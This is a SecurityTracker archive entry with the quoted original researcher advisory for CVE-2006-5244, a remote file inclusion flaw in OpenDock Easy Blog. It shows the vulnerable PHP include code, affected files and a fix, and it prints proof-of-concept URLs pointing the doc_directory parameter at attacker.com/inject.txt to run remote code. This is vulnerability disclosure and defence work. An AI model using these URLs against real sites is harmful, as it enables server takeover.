SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   OpenDock Easy BLOG Vendors:   opendock.net
OpenDock Easy BLOG Include File Bug in 'doc_directory' Parameter Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1017027
SecurityTracker URL:  http://securitytracker.com/id/1017027
CVE Reference:   CVE-2006-5244   (Links to External Site)
Updated:  Jun 2 2008
Original Entry Date:  Oct 10 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.4 and prior versions
Description:   A vulnerability was reported in OpenDock Easy BLOG. A remote user can include and execute arbitrary code on the target system.

The 'file.php' script does not properly validate user-supplied input in the 'doc_directory' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

The following files are also affected:

sw/lib_up_file/down_stat.php
sw/lib_up_file/file.php
sw/lib_up_file/find_file.php
sw/lib_up_file/lib_read_file.php
sw/lib_up_file/lib_form_file.php
sw/lib_comment/find_comment.php
sw/lib_comment/comment.php
sw/lib_comment/lib_comment.php
sw/lib_find/find.php

Other files not listed above are affected.

Some demonstration exploit URLs are provided:

http://[target]/[OpenDockEasyBlog_Path]/sw/lib_up_file/file.php?doc_directory=http://attacker.com/inject.txt?
http://[target]/[OpenDockEasyBlog_Path]/sw/lib_up_file/find_file.php?doc_directory=http://attacker.com/inject.txt?
http://[target]/[OpenDockEasyBlog_Path]/sw/lib_comment/comment.php?doc_directory=http://attacker.com/inject.txt?
http://[target]/[OpenDockEasyBlog_Path]/sw/lib_find/find.php?doc_directory=http://attacker.com/inject.txt?

Dedi Dwianto a.k.a the_day discovered this vulnerability.

The original advisory is available at:

http://advisories.echo.or.id/adv/adv50-theday-2006.txt

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  web.opendock.net/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [ECHO_ADV_50$2006]OpenDock Easy Blog <=1.4 (doc_directory)

ECHO_ADV_50$2006

-----------------------------------------------------------------------------------------------
[ECHO_ADV_50$2006]OpenDock Easy Blog <=1.4 (doc_directory) Multiple Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------------------

Author		: Dedi Dwianto a.k.a the_day
Date Found	: October, 09th 2006
Location	: Indonesia, Jakarta
web		: http://advisories.echo.or.id/adv/adv50-theday-2006.txt
Critical Lvl	: Highly critical
Impact		: System access
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application	: OpenDock Easy Blog
version		: <=1.4
URL		: http://web.opendock.net

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

In folder sw/lib_up_file/ I found vulnerability script file.php
--------------------------file.php---------------------------------------
....
<?

 include $doc_directory.$path_sw."lib_up_file/lib_file.php";
 include $doc_directory.$path_sw."lib_up_file/lib_form_file.php";
 include $doc_directory.$path_sw."lib_up_file/lib_read_file.php";
 include $doc_directory.$path_sw."lib_up_file/lib_page_file.php";
 include $doc_directory.$path_sw."lib_up_file/find_file.php";
 include $doc_directory.$path_sw."lib_up_file/down_stat.php";

...
----------------------------------------------------------

Input passed to the "$doc_directory" parameter in file.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.

Also affected files on Files:

sw/lib_up_file/down_stat.php
sw/lib_up_file/file.php
sw/lib_up_file/find_file.php
sw/lib_up_file/lib_read_file.php
sw/lib_up_file/lib_form_file.php
sw/lib_comment/find_comment.php
sw/lib_comment/comment.php
sw/lib_comment/lib_comment.php
sw/lib_find/find.php
etc..



Proof Of Concept:
~~~~~~~~~~~~~~~

http://target.com/[OpenDockEasyBlog_Path]/sw/lib_up_file/file.php?doc_directory=http://attacker.com/inject.txt?
http://target.com/[OpenDockEasyBlog_Path]/sw/lib_up_file/find_file.php?doc_directory=http://attacker.com/inject.txt?
http://target.com/[OpenDockEasyBlog_Path]/sw/lib_comment/comment.php?doc_directory=http://attacker.com/inject.txt?
http://target.com/[OpenDockEasyBlog_Path]/sw/lib_find/find.php?doc_directory=http://attacker.com/inject.txt?

Solution:
~~~~~~~
- Sanitize variable $doc_directory on affected files.
- Turn off register_globals

Timeline:
~~~~~~~
09 - 10 - 2006 Bugs Found
09 - 10 - 2006 Vendor Contact
09 - 10 - Public Disclosure

---------------------------------------------------------------------------

Shoutz:
~~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,boom_3x,mathdule,angelia
~ newbie_hacker@yahoogroups.com
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~~
     EcHo Research & Development Center
     the_day[at]echo[dot]or[dot]id
     
-------------------------------- [ EOF ]----------------------------------

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC